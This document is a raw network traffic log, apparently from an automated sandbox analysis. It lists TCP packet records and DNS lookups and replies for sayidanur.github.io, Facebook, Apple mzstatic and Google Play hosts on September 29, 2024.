                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.945951939 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.945960999 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.946017981 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.946810007 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.946841955 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.946907997 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.946907997 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.946918964 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.948096991 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.969887972 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.969907999 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.969958067 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.969965935 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.970022917 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.975855112 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.975871086 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.975902081 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.975910902 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.975939989 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.975943089 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.975961924 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.975981951 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.975991964 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.976016998 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.987936020 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.987997055 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.988029957 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.988050938 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.988078117 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.988095999 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.988145113 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.988157988 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.988207102 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.997972965 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.997992039 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.998050928 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.998058081 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.998090029 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.004395008 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.004405975 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.004436970 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.004466057 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.004472017 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.004481077 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.004499912 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.004518032 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.008280039 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.008296013 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.008362055 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.008368969 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.008402109 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.008402109 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.010312080 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.010377884 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.013288021 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.013356924 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.013380051 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.013400078 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.013418913 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.020812988 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.020859003 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.020890951 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.020896912 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.020917892 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.023413897 CEST44349823157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.024106026 CEST49823443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.032655001 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.032674074 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.032732964 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.032741070 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.037456989 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.037502050 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.037532091 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.037538052 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.037549973 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.037574053 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.037585020 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.038975000 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.039015055 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.039052010 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.039062977 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.039098978 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.043849945 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.043872118 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.043917894 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.043927908 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:24.043941021 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.759318113 CEST192.168.2.41.1.1.10xfe00Standard query (0)sayidanur.github.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.759478092 CEST192.168.2.41.1.1.10x775cStandard query (0)sayidanur.github.io65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.568839073 CEST192.168.2.41.1.1.10xc9bStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.568984985 CEST192.168.2.41.1.1.10xb5d9Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.150271893 CEST192.168.2.41.1.1.10xb33Standard query (0)sayidanur.github.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.153378010 CEST192.168.2.41.1.1.10xcebbStandard query (0)sayidanur.github.io65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:04.862063885 CEST192.168.2.41.1.1.10xa318Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:04.877510071 CEST192.168.2.41.1.1.10xefc1Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:14.917716980 CEST192.168.2.41.1.1.10x3c6Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:14.918113947 CEST192.168.2.41.1.1.10xc303Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:16.519689083 CEST192.168.2.41.1.1.10x6324Standard query (0)static.xx.fbcdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:16.520154953 CEST192.168.2.41.1.1.10x263dStandard query (0)static.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:18.218218088 CEST192.168.2.41.1.1.10x1bbdStandard query (0)facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:18.218390942 CEST192.168.2.41.1.1.10x2db4Standard query (0)facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.476809978 CEST192.168.2.41.1.1.10x4039Standard query (0)static.xx.fbcdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.477035046 CEST192.168.2.41.1.1.10x48e3Standard query (0)static.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.848400116 CEST192.168.2.41.1.1.10x6f3cStandard query (0)facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.848656893 CEST192.168.2.41.1.1.10xe08aStandard query (0)facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.708395958 CEST192.168.2.41.1.1.10xdb70Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.708570957 CEST192.168.2.41.1.1.10x295fStandard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.425791979 CEST192.168.2.41.1.1.10x903Standard query (0)is1-ssl.mzstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.425934076 CEST192.168.2.41.1.1.10x51efStandard query (0)is1-ssl.mzstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.426563978 CEST192.168.2.41.1.1.10x78beStandard query (0)is2-ssl.mzstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.426680088 CEST192.168.2.41.1.1.10x5bb4Standard query (0)is2-ssl.mzstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.445343971 CEST192.168.2.41.1.1.10xc402Standard query (0)is5-ssl.mzstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.445718050 CEST192.168.2.41.1.1.10x9995Standard query (0)is5-ssl.mzstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.454309940 CEST192.168.2.41.1.1.10xbb16Standard query (0)is4-ssl.mzstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.454469919 CEST192.168.2.41.1.1.10xa657Standard query (0)is4-ssl.mzstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.455410004 CEST192.168.2.41.1.1.10x242aStandard query (0)is3-ssl.mzstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.455548048 CEST192.168.2.41.1.1.10x1c8dStandard query (0)is3-ssl.mzstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:27.590956926 CEST192.168.2.41.1.1.10xf473Standard query (0)is1-ssl.mzstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:27.591161013 CEST192.168.2.41.1.1.10xfd8dStandard query (0)is1-ssl.mzstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:38.951523066 CEST192.168.2.41.1.1.10x3e4eStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:38.951726913 CEST192.168.2.41.1.1.10x9ecdStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:40.799509048 CEST192.168.2.41.1.1.10x3af3Standard query (0)play-lh.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:40.799972057 CEST192.168.2.41.1.1.10x6518Standard query (0)play-lh.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:42.093638897 CEST192.168.2.41.1.1.10x287eStandard query (0)play-lh.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:42.094144106 CEST192.168.2.41.1.1.10x4788Standard query (0)play-lh.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:11.826860905 CEST192.168.2.41.1.1.10x6977Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:11.827001095 CEST192.168.2.41.1.1.10xb5efStandard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:13.098660946 CEST192.168.2.41.1.1.10x4b94Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:13.099076033 CEST192.168.2.41.1.1.10xc113Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:15.372510910 CEST192.168.2.41.1.1.10xe7d3Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:15.372736931 CEST192.168.2.41.1.1.10x5ca7Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:36.637059927 CEST192.168.2.41.1.1.10x6346Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:36.637353897 CEST192.168.2.41.1.1.10x107dStandard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:40.792244911 CEST192.168.2.41.1.1.10x8579Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:40.792726040 CEST192.168.2.41.1.1.10xba0eStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.768539906 CEST1.1.1.1192.168.2.40xfe00No error (0)sayidanur.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.768539906 CEST1.1.1.1192.168.2.40xfe00No error (0)sayidanur.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.768539906 CEST1.1.1.1192.168.2.40xfe00No error (0)sayidanur.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.768539906 CEST1.1.1.1192.168.2.40xfe00No error (0)sayidanur.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.575906038 CEST1.1.1.1192.168.2.40xc9bNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.575906038 CEST1.1.1.1192.168.2.40xc9bNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.576395988 CEST1.1.1.1192.168.2.40xb5d9No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.158693075 CEST1.1.1.1192.168.2.40xb33No error (0)sayidanur.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.158693075 CEST1.1.1.1192.168.2.40xb33No error (0)sayidanur.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.158693075 CEST1.1.1.1192.168.2.40xb33No error (0)sayidanur.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.158693075 CEST1.1.1.1192.168.2.40xb33No error (0)sayidanur.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:04.868598938 CEST1.1.1.1192.168.2.40xa318No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:04.884303093 CEST1.1.1.1192.168.2.40xefc1No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:14.770553112 CEST1.1.1.1192.168.2.40x91d6No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:14.770553112 CEST1.1.1.1192.168.2.40x91d6No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:14.924794912 CEST1.1.1.1192.168.2.40x3c6No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:14.924794912 CEST1.1.1.1192.168.2.40x3c6No error (0)star-mini.c10r.facebook.com157.240.253.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:14.924949884 CEST1.1.1.1192.168.2.40xc303No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:16.526606083 CEST1.1.1.1192.168.2.40x6324No error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:16.526606083 CEST1.1.1.1192.168.2.40x6324No error (0)scontent.xx.fbcdn.net157.240.251.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:16.526688099 CEST1.1.1.1192.168.2.40x263dNo error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:16.526688099 CEST1.1.1.1192.168.2.40x263dNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:16.526688099 CEST1.1.1.1192.168.2.40x263dNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:17.013767958 CEST1.1.1.1192.168.2.40x8e9bNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:17.013767958 CEST1.1.1.1192.168.2.40x8e9bNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:18.225465059 CEST1.1.1.1192.168.2.40x1bbdNo error (0)facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.483359098 CEST1.1.1.1192.168.2.40x4039No error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.483359098 CEST1.1.1.1192.168.2.40x4039No error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.483519077 CEST1.1.1.1192.168.2.40x48e3No error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.483519077 CEST1.1.1.1192.168.2.40x48e3No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.483519077 CEST1.1.1.1192.168.2.40x48e3No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.856491089 CEST1.1.1.1192.168.2.40x6f3cNo error (0)facebook.com157.240.251.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.715004921 CEST1.1.1.1192.168.2.40xdb70No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.715004921 CEST1.1.1.1192.168.2.40xdb70No error (0)star-mini.c10r.facebook.com157.240.251.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.715481043 CEST1.1.1.1192.168.2.40x295fNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.432477951 CEST1.1.1.1192.168.2.40x903No error (0)is1-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.432564974 CEST1.1.1.1192.168.2.40x51efNo error (0)is1-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.433320045 CEST1.1.1.1192.168.2.40x78beNo error (0)is2-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.433571100 CEST1.1.1.1192.168.2.40x5bb4No error (0)is2-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.452363968 CEST1.1.1.1192.168.2.40x9995No error (0)is5-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.453517914 CEST1.1.1.1192.168.2.40xc402No error (0)is5-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.461498022 CEST1.1.1.1192.168.2.40xa657No error (0)is4-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.462248087 CEST1.1.1.1192.168.2.40x1c8dNo error (0)is3-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.462397099 CEST1.1.1.1192.168.2.40x242aNo error (0)is3-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:26.463234901 CEST1.1.1.1192.168.2.40xbb16No error (0)is4-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:27.597875118 CEST1.1.1.1192.168.2.40xfd8dNo error (0)is1-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:27.598110914 CEST1.1.1.1192.168.2.40xf473No error (0)is1-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:29.762265921 CEST1.1.1.1192.168.2.40x63afNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:29.762265921 CEST1.1.1.1192.168.2.40x63afNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:38.959455967 CEST1.1.1.1192.168.2.40x3e4eNo error (0)play.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:40.806664944 CEST1.1.1.1192.168.2.40x3af3No error (0)play-lh.googleusercontent.com142.250.185.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:42.100389004 CEST1.1.1.1192.168.2.40x287eNo error (0)play-lh.googleusercontent.com216.58.206.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:53.877121925 CEST1.1.1.1192.168.2.40xdd6fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:54:53.877121925 CEST1.1.1.1192.168.2.40xdd6fNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:11.834930897 CEST1.1.1.1192.168.2.40xb5efNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:11.834930897 CEST1.1.1.1192.168.2.40xb5efNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:11.834930897 CEST1.1.1.1192.168.2.40xb5efNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:11.834945917 CEST1.1.1.1192.168.2.40x6977No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:11.834945917 CEST1.1.1.1192.168.2.40x6977No error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
